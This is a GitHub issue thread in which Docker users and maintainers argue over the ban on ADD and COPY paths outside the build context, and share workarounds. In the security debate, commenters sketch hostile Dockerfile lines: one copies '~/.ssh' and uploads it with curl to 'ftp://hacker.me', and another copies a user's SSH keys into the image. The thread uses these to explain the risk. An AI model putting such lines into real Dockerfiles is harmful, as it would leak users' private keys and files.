moby: Add with relative path to parent directory fails with "Forbidden path"

If you have an add line in the Dockerfile which points to another directory, the build of the image fails with the message “Forbidden path”.

Example:

FROM tatsuru/debian
ADD ../relative-add/some-file /tmp/some-file

Gives:

$ ../bundles/0.6.6-dev/binary/docker-0.6.6-dev build .
Uploading context 20480 bytes
Step 1 : FROM tatsuru/debian
 ---> 25368de90486
Step 2 : ADD ../relative-add/some-file /tmp/some-file
Error build: Forbidden path: /tmp/relative-add/some-file

I would expect the file to be written to /tmp/some-file, not /tmp/relative-add/some-file.

About this issue

  • Original URL
  • State: closed
  • Created 11 years ago
  • Reactions: 40
  • Comments: 167 (18 by maintainers)

Commits related to this issue

Most upvoted comments

@wwoods - even if the client were to parse the Dockerfile and work out what files to send and which to discard, we still can’t afford to bust out of the current directory and let your builder access your client’s entire file system.

There are other solutions to your scenario that don’t increase our insecurity footprint.

either way, restricting the Dockerfile to the current context is not going to change, so I’m going to close this.

I find this behavior fairly frustrating, especially for “meta” Dockerfiles. E.g. I have a /dev folder I do most work in, and I want /dev/environments git repo which has e.g. /dev/environments/main/Dockerfile. It’s very annoying not allowing that Dockerfile to:

ADD ../../otherProject /root/project

To add /dev/otherProject as /root/project. Using an absolute path breaks sharing this Dockerfile with other developers.

How is it insecure to allow the builder to access files readable to the user? Why are you superseding linux file security? Please realize that this greatly limits the use cases of Docker and makes it much less enjoyable to add to existing workflows.

-1 to nannies that want to shorten my rope because I might hang myself with it

Sorry to hijack, but this seems completely broken to me. I’ve got a grand total of about 2 hours of Docker experience, so this is likely a problem with my understanding than docker.

I’m going to be creating approximately 10 images from our source tree. But to be able to use the ADD command, I would have to put the Dockerfile in the root of the tree, so only 1 image could be built. Not to mention the fact that this would result in a context of close to 100 megabytes.

I could do an ADD with URL’s, but this would make it much more difficult for dev’s to create images for testing purposes.

Another option would be to add source to the image via volumes instead of adding it, but this really seems contrary to the spirit of Docker.

It seems to me that one partial, easy solution would be to modify the build command so that the context and the Dockerfile could be specified separately.

This behaviour is very bizarre and I really don’t think it’s up to users of Docker to care about why it’s implemented the way it’s implemented. What matters is that it’s highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/
├── docker-compose.yml
├── login-queue
│   ├── Dockerfile
server/
├── login-queue
│   ├── pom.xml
├── login-queue-dependency
│   ├── pom.xml
├── pom.xml
├── 500MB folder

My first attempt was doing relative ADDs in the docker/server/Dockerfile. i.e

ADD ../../server/login-queue /opt/login-queue
ADD ../../server/login-queue-dependency /opt/login-queue-dependency

This did not work to my surprise. You can’t add files outside of the folder of where you run docker build from. I looked for some alternatives and found the -f option and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

`unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)``

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here’s the issue now, my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access ../login-queue-dependency so I have to move server/login-queue-dependencyinto server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.

That seems pretty flawed, in that it greatly restricts the viable scope of Dockerfiles. Specifically, it disallows Dockerfiles layered on top of existing code configurations, forcing users to structure their code around the Dockerfile rather than the other way around. I understand the reasoning behind allowing the daemon to be on a remote server, but it seems like it would greatly improve Docker’s flexibility to parse the Dockerfile and upload only specified sections. This would enable relative paths and reduce bandwidth in general, while making usage more intuitive (the current behavior is not very intuitive, particularly when playing on a dev box).

@wwoods I set up a GitHub repository with code and a Dockerfile in it, you clone it to ~/code/gh-repos/, cd to ~/foobarbaz and run docker build -t foobarbaz .. Let’s say I’m a bad guy and I add something like this to the Dockerfile: ADD .. /foo. The image will now contain your entire home directory and anything you might have there. Let’s say the resulting image also ends up on the Internet on some registry. Everyone who has the image also has your data - browser history & cookies, private documents, password, public and private SSH keys, some internal company data and some personal data.

We’re not going to allow Docker ADD to bust out of its context via .. or anything like it.

This is a major pain in the ass for us and apparently a lot of people. In our case we are now having to create a separate repo and script around this because Docker won’t copy files from a repo of shared code that is symlinked in. I have to agree that Docker should not be worrying about the security aspect. It should trust devs to know what they’re doing. There are a million ways to shoot oneself in the foot in development if you don’t, but at least we have the option to do it.

And for the record, copying shared common code into a build is not insecure or shooting oneself in the foot. It should be possible.

This is so stupid. I need to add specific resources from a folders, like my built application, and my front end resources. Unfortunately docker won’t allow you to do ADD ../ , and it strangely includes random files I don’t specify with add when I do it from the parent folder. Why does it do this?

Why do the best practices state that the Dockerfile be in its own empty directory, and then disable relative pathing? That makes no sense.

first up, when I want to build several images from common code, I create a common image that brings the code into that image, and then build FROM that. more significantly, I prefer to build from a version controlled source - ie docker build -t stuff http://my.git.org/repo - otherwise I’m building from some random place with random files.

fundamentally, no, when I put on my black-hat, I don’t just give you a Dockerfile, I tell you what command to run.

let me re-iterate. there are other ways to solve your issues, and making docker less secure is not the best one.

Well, I have a workaround, even if i am not sure it will solve all use cases. I you have a tree like this:

A
│   README.md 
└───B
│   │   myJson.json
│
└───C
    │   Dockerfile

And you need to access myJson.json from the dockerfile, just write the dockerfile as if you were in A:

FROM my_image
ADD ./B/myJson.json .

And then launch docker specifying the path to the Dockerfile:

docker build -f ./C/Dockerfile  .

That way, it work for me.

Moreover if you use docker compose, you can also do (assuming your docker-compose.yml is in A):

version: '3'
services:
  my_service:
    build:
      context: ./
      dockerfile: ./C/Dockerfile

Just stumbled upon this bug and I am dumbfounded how such a limitation still exists in 2017.

@Vanuan please consider that the GitHub issue tracker is not a general support / discussion forum, but for tracking bugs and feature requests.

Your question is better asked on

  • forums.docker.com
  • the #docker IRC channel on freenode
  • StackOverflow

Please consider using one of the above

The build actually happens in /tmp/docker-12345, so a relative path like ../relative-add/some-file is relative to /tmp/docker-12345. It would thus search for /tmp/relative-add/some-file, which is also shown in the error message. It is not allowed to include files from outside the build directory, so this results in the “Forbidden path” message.

It was not clear to me that the directory is moved to another directory in /tmp before the build, or that the paths are resolved after moving the directory. It would be great if this can be fixed, or if the error message could be clearer. For example: “relative paths outside the sandbox are not currently supported” when supplying a relative path, or “The file %s is outside the sandbox in %s and can not be added” instead of “Forbidden path”.

This is extremely unfortunate. At this point, it’s physically impossible for me to add any new ideas, since all of them have already been brought up. But for some reason, the Docker people seem to keep complaining about security aspects.

This makes less than zero sense: just add an --enable-unsafe-parent-directory-includes flag, which is disabled by default. Boom: everyone is happy. Can we stop pretending that security is a concern here?

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I’m stupid enough that they also could have convinced me to run rm -rf ~.

Would it be possible to amend an option flag that could allow users to manually add specific directories to expand the context?

Even after all these years, this silly restriction hasn’t been fixed? I swear Docker is growing less appealing by the hour.

Sad.

To be honest this is quite an annoying “feature”. Our work around was with scripting, copying the necessary files before running docker build then removing them.

It would be much easier if you could reference parent folders.

Put it in the root and use the .dockerignore file

On Jun 28, 2016, at 12:10, arianitu notifications@github.com wrote:

This behaviour is very bizarre and I really don’t think it’s up to users of Docker to care about why it’s implemented the way it’s implemented. What matters is that it’s highly unintuitive and makes working with Docker in an existing project difficult. Why do I need to re-structure my project to get Docker to copy some files over? Seriously.

Here is an example of my project.

docker/ ├── docker-compose.yml ├── login-queue │ ├── Dockerfile server/ ├── login-queue │ ├── pom.xml ├── login-queue-dependency │ ├── pom.xml ├── pom.xml ├── 500MB folder My first attempt was doing relative ADDs in the docker/server/Dockerfile. i.e

ADD …/…/server/login-queue /opt/login-queue ADD …/…/server/login-queue-dependency /opt/login-queue-dependency This did not work to my surprise. You can’t add files outside of the folder of where you run docker build from. I looked for some alternatives and found the -f option and tried:

cd server && docker build -t arianitu/server -f docker/login-queue/Dockerfile .

This does not work either because the Dockerfile has to actually be inside the context.

unable to prepare context: The Dockerfile (docker/login-queue/Dockerfile) must be within the build context (.)`

Okay, so I have the option to move all the Dockerfiles into the server/ folder.

Here’s the issue now, my image requires both login-queue and login-queue-dependency. If I place the Dockerfile in server/login-queue, it cannot access …/login-queue-dependency so I have to move server/login-queue-dependencyinto server/login-queue, or make a Dockerfile in the root of server/. If I place the Dockerfile in the root of server/, I have to send the 500MB folder to the build agent.

Jesus, I want to selectively pick some folders to copy to the image (without having to send more than I actually need to send, like the entire server/ directory.) Something seems broken here.

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or mute the thread.

@festus1973 read https://github.com/docker/docker/issues/2745#issuecomment-35335357 on the “why”. Keep in mind that docker build runs at the daemon, which could be on a remote server. The daemon gets passed the “context”, which is an archive (.tar) of the files to use for building, so simply does not have access to anything outside that, because it’s not in the archive. In addition, a Dockerfile having full access to your client machine is a major security concern (as has been mentioned in this thread).

Allowing “random” files from the client that triggers the build to be sent to the daemon (for building) requires a complete rewrite of the way the builder works. Alternative approaches (such as an rsync-like approach, where the daemon requests files from the client when needed) are being looked into, but do require a lot of engineering, design, and security audits.

Meanwhile, alternative approaches (admittedly, less convenient) are mentioned in this discussion https://github.com/docker/docker/issues/2745#issuecomment-253230025

@thaJeztah Thanks for being patient to such ignorant comments and keep up the good work!

@Vanuan: I’m new to Docker and am totally unfamiliar with Linux commands (I’m on Windows) but if I understand you correctly, it looks like you’re presenting a scenario wherein a dockerfile instructs the docker build engine to (1) copy a file or path containing private keys (or some other sensitive info) to a newly built docker container image and then (2) FTP the contents to a malevolent third party.

But how would I get that infected dockerfile into my build environment in the first place? Is the hacker going to email it to me? Let’s say he does. Even if he did AND I were stupid enough to accept a file from a random party AND I decided I wanted to execute the contents of said random file, how would I do so? It’s not like I a can trigger a build simply by clicking on a dockerfile. It’s nothing but a text file. A text file is far safer than a .js, .exe, or countless other filetypes that DO have default file handlers when clicked. No, I’d have to intentionally accept the file, not look at its contents, copy it to a dev environment, and manually run a build on it. That’s rather contrived, no?

Seems to me you’d have to have sufficient permissions on the machine(s) housing the dockerfile and source-files in question, as well as the machine running the build. But if you have those permissions already (the ability to read the /.ssh folder, execute the build, etc.) then there are far more effective vectors of attack than attempting to sneak in a bad dockerfile.

I just don’t see how this can be spun as a security issue. There may be other valid technical reasons for this ‘context’ design decision, but I’m just not buying the security angle.

As for whether or not I run untrusted code in a VM… Sure, if it’s a throw-away VM not connected to the rest of my network. Otherwise, I use sensible security practices (e.g. not accepting dockerfiles from unknown parties and then attempting to feed them into a critical build process) and I rely on the OS file system security to do its job.

I successfully worked around this issue using volumes. Example directory structure:

web/
- Dockerfile -> `ADD . /usr/src/app/`
- (code)

webstatic/
- Dockerfile -> `ADD . /usr/src/app/subdir`
- (code)

compose file excerpt:

web:
  build: ./web/

webstatic:
  build: ./webstatic/
  volumes_from:
    - web

Then in the webstatic code I can access the code from the web container. No need for ADD ../web/ .. in webstatic.

+1. There is no reason not to make this possible.

@Vanuan You’re the one working countless hours on open source projects for zero pay and you’re calling me ignorant? Really? But yeah, definitely, keep up the “good work.” Great business model by the way. Please do keep cranking out that code for us, mate! I’m sure you’ll be able to trade in those upvotes you’ve earned for cash one day, or perhaps a figurine of your favorite sci-fi character.

@thaJeztah Thanks for the useful reply. All I can say in response is to point out the same things that other people in this thread and other forums have already noted:

  • A docker file can’t have “full access” access to anything. It’s just a text file.

  • Most people are running this thing as admin on their own machine. They don’t expect to get an ‘access denied’ error when trying to access their own files.

  • Your description of the docker’s design was helpful. That said, even if the your docker build engine were running on a different machine, wouldn’t that untrusted machine still be subject to the permissions of builder’s local file system? In other words, if a malicious user operating on the machine where the docker builder service is being run tried to surreptitiously insert an ADD/COPY instruction targeting \mylocalMachine\windows\system32\someprivateThing.dat, the attempt would fail on its own due to a permissions denial when trying to execute the ADD/COPY, amiright?

  • Someone pointed to a link in the documentation about this whole “context” concept. It was informative. Most new users aren’t going find that though. They’re going to get an “access denied” message when referencing file(s) and folder(s) on their own machine that they know for a fact exist – and by the nature of the error message will just assume the product is fundamentally broken. If there were at least a helpful error message, perhaps mentioning a keyword like ‘context’ or better yet, one quick sentence about the unusual folder structuring requirements, it would make a world of difference. Then the user could step back and make a rational decision on whether or not he wants to (a) totally rework the natural existing folder structure he has in place in order to make it Docker centric instead of workflow-centric, or (b) write a program to copy his source files into a standalone Docker-centric folder structure, or © move on.

Again, nothing new here. Just recapping what other new users like me have already pointed out. The only surprise from my standpoint is that this has been a confusing stumbling block for new users since 2013 and no action (not even an enhanced error message) has been taken to mitigate.

How about my suggestion of adding an option to the build command so that the root directory can be specified as a command line option? That won’t break any security, and should cover every use case discussed here.

Opened https://github.com/moby/moby/issues/37129 with a proposal for multiple build-contexts

The daemon still needs to have all files sent. Some options that have been discussed;

  • Allow specifying a --ignore-file so that multiple Dockerfiles can use the same build-context, but different paths can be ignored for each Dockerfile (https://github.com/moby/moby/issues/12886)
  • The reverse: allow specifying multiple build-contexts to be sent, e.g.
docker build \
  --context lib1:/path/to/library-1 \
  --context lib2:/path/to/library-2 \
  --context api1:/path/to/api1 \
  .

Inside the Dockerfile, those paths could be accessible through (e.g.) COPY --from context:lib1

Just came up against this problem. Would like a config option to get around this.

@mauricemeyer @kitsuneninetails @ReinsBrain As it has already been mentioned numerous times it’s not purely a security issue. Docker has a client-server architecture. Docker builder is currently implemented on the server side. So if you want to use files outside the build context you’d have to copy those files to the docker server.

One things docker newbies don’t realize is that you can keep Dockerfile separate from build context. I.e. if you have root/proj1/build/Dockerfile, root/proj2/build/Dockerfile, root/common/somecommonfile you can still set build context to root. But the next thing you’ll complain about is that the build would take prohibitively long as you now have to copy whole root directory to the machine where the docker server resides.

Basically docker is either trying to prevent doing work on something people really need and have to do hacky-workarounds for, or they think linux file system security isn’t good enough.

That would work fine; I’ll just point out the security implications are the same. From my perspective that’s fine though, in that the context change is very transparent on the command line.

As for why they’re the same, you have:

docker build -f Dockerfile ..

Equivalent to the aforementioned

docker build -c .. .

I do like the Dockerfile / context specification split in #2112 better though. Good luck with that 😃 Hopefully it gets merged in.

You can use multi-stage builds;

Create a Docker image for your packages (or build several of such images)

Dockerfile.packages:

FROM scratch
COPY instrumentation.jar /

Build it;

docker build -t my-packages:v1.0.1 -f Dockerfile.packages .

Now, every image that needs these packages can include them as a build-stage. This gives the advantage over a “base image” that you can “mix and match” what you need;

FROM my-packages:v1.0.1 AS packages

FROM nginx:alpine
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Another image that also wants this package, but uses a different base-image;

FROM my-packages:v1.0.1 AS packages

FROM mysql
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Or several of your “package” images

FROM my-packages:v1.0.1 AS packages
FROM my-other-packages:v3.2.1 AS other-packages

FROM my-base-image
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar
COPY --from=other-packages /foobar-baz.tgz /some/other-path/foobar-baz.tgz

Me too, man. I eventually gave up on Docker. I’m not claiming that others haven’t found viable uses for it. In fact, I know they have and I wish them the best. But from my perspective, everything I try to do with Docker dead-ends in some obscure bug or limitation. Even with seemingly simple tasks, Docker seems to fight me every step of the way. Some of the problems have solutions but they’re undocumented and require a fair amount of hacking and trial-and-error to resolve, particularly if one is using Windows Server instead of Linux. I searched around and saw a lot of users, particularly Windows users, giving up in frustration so decided to follow their lead. Perhaps it’ll be a more polished, viable solution for me a few years down the road but it’s just not there yet.

another work-around: forget docker and go higher up the chain using LXD to host your own complete images

You can’t get around this with symbolic links, either, unfortunately.

-1 Reduces Docker security? What security? Its about portability.

@graup so now you have two containers that have to run on the same host. Docker volumes and volume management is one of its weakest points.

Please read back https://github.com/docker/docker/issues/2745#issuecomment-278505867 (and https://github.com/docker/docker/issues/2745#issuecomment-35335357). There is no “permission” check here. A Dockerfile cannot refer to files outside the passed build-context because those files are not there.

Thanks, I’m switching to using Docker in swarm mode, and organizing the code is an important part. I thought changing the dockerfile context to a parent directory is not possible, turned up that it is. This is what I ended up doing:

Regarding file organization:

/app - project’s root directory

  • setup - docker related files, build tools, shellScripts, & tests
  • source - raw project code (server & client sides)
  • distribution - production ready code

Regarding “Forbidden path” error:

Running docker-compose up from project root folder, like so: docker-compose -f ./setup/<docker-compose>.yml up Inside docker-compose file:

...
    build:
      # Setting context of dockerfile which will be executed.
      context: ../
      dockerfile: ./setup/<dockerfilename>
    # Volume path is relative to docker-compose file, not the dockerfile execution context.
    volumes:
      - ../source/:/app/source/
...

& for running individual dockerfiles:

  • cd to project’s root directory
  • docker build -t <imagename> -f setup/nodejsWeb.dockerfile ./
  • docker run -d <imagename>

This way dockerfile/dockercompose can use parent directory in the process of creating images. This is what makes sense for me.

Not being able to reference parent folder makes docker more complicated than it should be. Undesirable “feature”. Why take this choice from user?

=> Our work around was with scripting, copying the necessary files before running docker build then removing them.

Thank you for your solution.

So why can’t we do this? A tool should not be enforcing it’s own ideology onto it’s users when it’s designed to be as versatile as possible.

This is something that baffles me also. I just ran into this limitation, and I can’t see any reason for it. To say this is a security issue due to malicious people placing bad lines in their Dockerfile and then telling people to clone, build, and publish the image is flimsy reasoning. If I pull a Dockerfile from the Internet (github or whatever) and blindly follow orders without looking at the file to create an image that I subsequently blindly and naively publish to a public repository, I will reap what I deserve. To limit the product for that edge case is specious logic at best.

I am using (and highly recommend if possible) the workaround proposed by @Romathonat which actually works in my case, because I can have central config isolated in its own parent directory, but it’s easy to see how that case might not work for everyone.

But, at the core, it’s frustrating to see so many people speaking out with user experiences just to get shut down without a fair hearing.

(Added: I’ll just leave this here from Moby’s README.md):

Usable security: Moby will provide secure defaults without compromising usability.

So much for running a microservice architecture with multiple repositories and Dockerfiles. 😕 Please reopen.

Edit: As a workaround, I created a parent repository and added my other repos as git submodules. I feel like it’s a hacky solution though.

@Romathonat it doesn’t unfortunately. You could add every directory to the dockerignore and it would be just as big. It unavoidably adds everything in the parent directory. Docker states in its official docs that the Dockerfile should be in its own empty directory, … but then disables relative pathing.

I used a similar approach, writing a PowerShell script to copy all necessary files to a docker-centric folder structure prior to running the build. It’s becoming fairly clear that the whole ‘context’ bit was a fundamental design mistake that’s extremely hard for developers to fix at this stage – and is thus it’s being spun as a “security issue.”

I’m with festus1973 in not getting what attack vector this is supposed to counteract. The fear is of instructions being added to the Dockerfile that expose the user’s files in an image and potentially in a public repository. But if an attacker can insert such commands into my Dockerfile then apparently my machine is already compromised, and my user files can be siphoned off anyway.

But maybe exactly this scenario once played out not after an attack, but by user error and accident? But for now the answer seems to be to do surgery to our projects to move exactly the files depended on by Docker into a single subdirectory, but no others, a scenario which is likely to lead to people copy-pasting files, or moving files out of their natural context, or having to pass their entire project directory in to the daemon, or other unsavory things like that.

Maybe this would be better as a loud warning with a command-line flag to silence it?

There really should be a command line option to allow this, something like “–allow-relative-imports”. Or even better, have a way to specify additional locations for the build context (not substitutes), e.g.: “–additional-paths=/path/a:/path/b:/path/c”.

As for the relative paths option, there’s no need for it to follow relative paths by default, so no security issue unless enabled. However not having it at all is a huge disadvantage that leads to the usage of other build tools wrapped around docker build - which isn’t just inconvenient but also totally circumvents this security mechanism making it useless for these usecases, anyways.

+1 for allowing something like ‘COPY …/…/src’

I’m sorry, but any environment that pushes developers to use so clumsy project structures will never mature and leave the mickey-mouse stage. This is not how successful products evolve and no PR hype can be a saver for long.

Docker team, please propose some viable solution.

+1. This looks like a very basic and useful feature. Sharing code/library between containers is a challenging task, and this limitation makes it worse.

+1 for the allow-parent-folders flag.

Gotcha… still really need some workaround for this issue. Not being able to have a Dockerfile refer to its parents sure limits usage. Even if there’s just a very verbose and scary flag to allow it, not having the option makes Docker useless for certain configurations (again, particularly when you have several images you want to build off of a common set of code). And the upload bandwidth is still a very preventable problem with the current implementation.

@festus1973 I think the threat model here is that you download and run some project with a Dockefile which will contain this:

ADD ~/.ssh /root/.ssh
RUN sh -c "zip ssh.zip /root/.ssh; curl -T ssh.zip ftp://hacker.me"

Sure, it’s not a threat model for a mass-scale user, but it’s absolutely possible for a more targeted attack. The reason why it has not happened yet is cryptic. Do you always run untrusted code in a virtual machine?

The context for https://github.com/six8/dockerfactory is created by taring up whatever the user defines.

I think the problem of allowing Dockerfile to specify arbitrary directories is someone creating a public Dockerfile could maliciously read things like your SSH keys. Simply add COPY /home/$USER/.ssh .ssh and have the default entrypoint push them somewhere the attacker could retrieve them. So by default, denying anything out of the Dockerfile directory makes sense from a security perspective.

However, for custom build systems, it makes sense to be able to define arbitrary build contexts. Docker does provide a way via taring up files and piping them in, but that’s not declarative like Dockerfile. You end up having to check in build scripts that will handle taring and then passing to docker. You can’t just simply docker build . anymore. So anything someone comes up with to do this will be non-standard and thus more confusing.

I think you’ll always need something outside of Dockerfile to be able to pass in arbitrary contexts for security sake. But that doesn’t stop docker from creating something like Dockerfactory.yml to be able to do it so it will at least be a standard.

I prefer a declarative approach in a file like Dockerfile and Dockerfactory.yml, but having it build into the docker build command would make it more obvious. Something like:

# --context <host dir>:<container dir>
docker build --context ../../lib-src:/lib-src --context ../src:/src .

--context would mirror --volume and be a concept most people using Docker are familiar with.

A malicious person could still tell you to do docker build --context $HOME:/home . and steal your files. However, you’d have to manually run this command and wouldn’t automatically happen because you check out a Dockerfile and run it blindly.

I use tar to work around this.

Say I have directories:

a/Dockerfile
a/libA
b/libB
c/libC

and I am in directory a working on my project, you can do tar cf - . -C ../b libB -C ../c libC | docker build - and you will get a build context which has (at top level) Dockerfile libA libB libC. (-C just changes directory while constructing the tarball)

I was wondering about adding similar syntax to docker build so you can do the same thing, construct the context from a disjoint set of files. This does not have any of the issues that symlink following has from the security point of view, and is relatively simple to implement, just haven’t decided on a clear syntax yet, and whether it needs other features.

Note that for complex builds, using tar | docker build - is very flexible, as you can carefully construct build contexts rather than using .dockerignore and it is fast.

@integrii Read above the recommended option: do not use Dockerfile for development. Use go base image + docker-compose + mounted folders.

I’ll be the thousandth person to mention that this is an issue, but here’s my situation.

I’m working in a haskell codebase that defines a dependency file (stack.yaml) at the root of the project. We have subprojects that are only tangentially related, but everything is built using the global stack.yaml at the project root. I need it in order to build a subproject, but we should have dockerfiles per subproject, not for the whole megarepo.

.
├── stack.yaml
├── project-a
│   ├── Dockerfile
│   └── (etc)
└── project-b
    ├── Dockerfile
    └── (etc)

Builds should be local to project-a, for example, but I need the stack.yaml from the parent directory in order to build. This is a huge problem and I, like many others, think there should be a configuration variable or docker flag that allows users work around this issue.

Apparently, quite a couple of people seem to think that using tar solves this problem. Good luck trying to use the tar approach with 30 different docker containers, when each needs its own hand picked context. Especially if they are rebuilt regularly. You will end up using some sort of build script or ugly workaround. And that’s the entire point of this discussion. It should not be necessary to do what we are doing, when the problem could be treated at its source.

IMO if Docker is not willing to work with parent directory files for some sort of security reasons, it should work with symlinks in the current directory to parent directory files

e.g.

bar/
   actual-file.sh
foo/
   baz/          << current working directory has symlink to a parent directory
      symlink-to-actual-file
      Dockerfile

right now Docker is calling lstat on a symlink that exists, and it’s giving me this error:

lstat symlink-to-actual-file: no such file or directory

if the symlinks are there, permissions should be fine

To wrap this up: There are several options.

  1. Use .gitignore with negative pattern (or ADD?)
*
!directory-i-want-to-add
!another-directory-i-want-to-add

Plus use docker command specifying dockerfiles and context:

docker build -t my/debug-image -f docker-debug .
docker build -t my/serve-image -f docker-serve .
docker build -t my/build-image -f docker-build .
docker build -t my/test-image -f docker-test .

You could also use different gitignore files. 2. Mount volumes Skip sending context at all, just use mounting volumes during run time (using -v host-dir:/docker-dir).

So you’d have to:

docker build -t my/build-image -f docker-build . # build `build` image (devtools like gulp, grunt, bundle, npm, etc)
docker run -v output:/output my/build-image build-command # copies files to output dir
docker build -t my/serve-image -f docker-serve . # build production from output dir
docker run my/serve-image # production-like serving from included or mounted dir
docker build -t my/serve-image -f docker-debug . # build debug from output dir
docker run my/serve-image # debug-like serving (uses build-image with some watch magic)

Is that something that people usually do? What are devs best practices? I’m sorry, I’m quite new with docker. Quite verbose commands there. Does it mean docker isn’t suitable for development?

Another note - the only possible workaround I’ve found is to symlink the Dockerfile to the root /dev folder. This results in a very long and resource intensive “Uploading context” stage, which appears to (quite needlessly) copy all of the project directories to a temporary location. If the point of containers is isolation, and Dockerfiles (rightfully) don’t seem to allow interacting with the build system, why does Docker need to copy all of the files? Why does it copy files that are not referenced in the Dockerfile at all?

It looks like there are some people who want to reference any files from the Dockerfile. But Dockerfile parsing is done on the docker server. So there’s no way it could know which files are referenced.

There are some local image builders, but you have to install them yourself. Plus they’ll probably still need to be run in the VM. And yet, you have to push the images you build to the docker server.

Some people are asking to change message from “Forbidden path” to something more understandable. Does the message “You can’t reference files outside the build context” make more sense to you?

Your #2 is a non-solution if the Dependency is used by more than one MyOrg projects, which, if I understand correctly, is the entire point of @warent’s setup. #3 also breaks once there is more than one top-level project. That really leaves us with just solution #1, which is a lot of hassle for something that should be a non-issue.

Virtually every build system on the planet supports this setup (e.g. CMake’s add_subdirectory actually lets you ascent into the parent directory etc.); Docker is the special needs child here 😃

Wouldn’t it be trivial for Docker to do quick static analysis and detect whether a relative parent directory is being accessed? Then when you try to run or build it, it would abort saying This Dockerfile dangerously accesses parent directories. After making sure you understand the security implications, please run again with the flag --dangerouslyAllowParentDirectories and then add those relative directories to the build context

@Vanuan :

If you allow people to reference any files on your server you’d risk that people would be able to steal private code from each other. How would you solve this?

You run people’s dockers inside their own (isolated) containers.

@kitsuneninetails - you hit the nail on the head. i would like to use docker, but this issue is show-stopper for me and I suspect many others. I take responsibility for what software I choose to remotely include as part of my own and I don’t need/want authoritative hobblings of what I can do with software and which effectively take away my responsibility with the lame excuse/insult that I (and the larger group of my peers) am irresponsible. I build my own dockers from the ground up anyway so that “security” issue does not apply in my case. If they want to continue with this foolishness, they do it at their peril because there are competitors nipping at their heels - I’m just doing my research on https://www.packer.io/intro/why.html - I haven’t yet fully understood if it is the replacement I’m looking for but I suspect it will be the docker killer.

Yes, basically docker build “bundles” the files, and sends them off to the daemon. the Dockerfile is the “script” to apply to those files.

We fully understand that being restricted to having all files in a single location can be limiting; the current “model” makes it very difficult to diverge from that. Things to consider are;

  • an option to provide multiple build contexts (docker build --context-add src=/some/path,target=/path/in/context --context-add src=/some/other/path,target=/some/other/path/in/context -f /path/to/Dockerfile)
  • parsing the Dockerfile client-side, then collect all that’s requested, or use an rsync approach (daemon requesting files from the client). Allowing “arbitrary” paths in the Dockerfile would not work though, because you want the build to be “portable”, “reproducible” (i.e., we don’t want “it works on my machine, because my files happen to be in /home/foo/some/dir”, but it breaks on your machine, because they are located in /home/bar/some-other-dir)

So to keep them reproducible, you’d want to have a “context” in which the files can be found in a fixed location.

There’s a lot of other improvements that can be made to the builder process, and I know there’s people investigating different solutions, creating PoC’s. I’m not up to speed on those designs, so it could be entirely different to my “quick” brain dump above 😄

@myuseringithub Are you new to Docker? Because after using Docker for a year, I figured that the most effective folder structure to use with docker is the following:

/app/Dockerfile /app/dev/Dockerfile

I.e. you only need 2 dockerfiles:

  • one for production-like environment (including qa, staging, etc), where application is built from sources and included in an image
  • one for development-like environment (including test, ci, etc), where source files are mounted to a running container, and image only contains rarely modified dependencies

+1 for an option that allows turning off the relative pathing restriction.

It’s always a good idea to have “secure” defaults, no need to debate that, but by now it should be apparent that there are a bunch of workflows that get forced into ugly workarounds because of this. That would be completely unnecessary with an option to turn it off (while the default behavior would remain the same).

Some info on my use case. I have a docker/ directory with services subdirectories within. So it’s like project_root/docker/serviceA/Dockerfile, project_root/docker/serviceB/Dockerfile, etc. I have a project_root/docker/docker-compose.yml file that runs installs on all the services. That’s the structure used and it works great, and is limited solely by the “COPY …/src/ /dest/” limitation in a Dockerfile.

I’ve had to write a script to copy each project_root/service/ directory into the directory with the docker/service/Dockerfile and run the build, which runs the Dockerfile with the COPY command (and without the “evil” …/ pathing). To me, this limitation seems just plain erroneous. I think a good fix would be to either allow turning it off through a config variable, or just by taking out the limitation completely. The point was made above that if this is a security concern, then the user running docker shouldn’t have access to the relative path directory in the first place. I agree with that point. We already have a wheel, so let’s use it and not reinvent it instead.

Seems like a config variable would make everybody happy, something like “allowRelativePathCopies: true”. My vote would be to have it enabled by default, obviously 😄

@graup It is a very nice workaround but it covers a serious design problem. Thanks for sharing this! I can’t believe the docker design forces us to have such workarounds or forcing us a directory structure which is not our choice… This must be fixed.

Thanks for sharing again.

Sometimes you definitely do want to build from a random place with random files - generating a local test image not based off of a commit, for instance. If you have a different testing server or just want to run several different tests at once locally without worrying about database interactions between them, this would be really handy. There’s also the issue where Dockerfiles can only RUN commands they have all information for - if your versioned remote source is password / key protected, this means you’d have to give your Docker image the password / key information anyhow to perform a build strictly with Docker.

There might be ways to solve these issues, but that doesn’t mean they’re pleasant, intuitive, or particularly easy to track down. I don’t think docker would be less secure by allowing a change of context on the command line. I understand the reasons for not transparently stepping outside of the build context. On the other hand, not knowing what you’re running will always be a security risk unless you’re running it in a virtual machine or container anyway. To get around the Dockerfile limitations, packages might have to ship with a Makefile or script that could easily commit the very offenses you’re trying to avoid. I don’t think that the “docker build” command is the right place for the level of security you’re talking about. Making it harder to use / require more external scaffolding makes it more tempting to step outside of Docker for the build process, exacerbating the exact issues you’re worried about.

Which means you now have two repositories: one that contains the build scripts, and another containing the code. Which have to be properly synchronized. You can use git submodules or git subtrees or ad hoc methods, but all of those options have serious drawbacks. There are many reasons, some good, some bad, that corporations tend to have a single repository containing everything. AFAICT, Facebook is one example of a place that only has a single source repository that contains everything.

@wwoods the short answer is that the docker client does not parse the Dockerfile. It tgz’s the context (current dir and all subdirs) up, passed it all to the server, which then uses the Dockerfile in the tgz to do the work.

@vilas27 Yes, this is tutorial describes how to set a context directory.

Which implies that the problem here is that docker build --help is not descriptive enough:

docker build --help

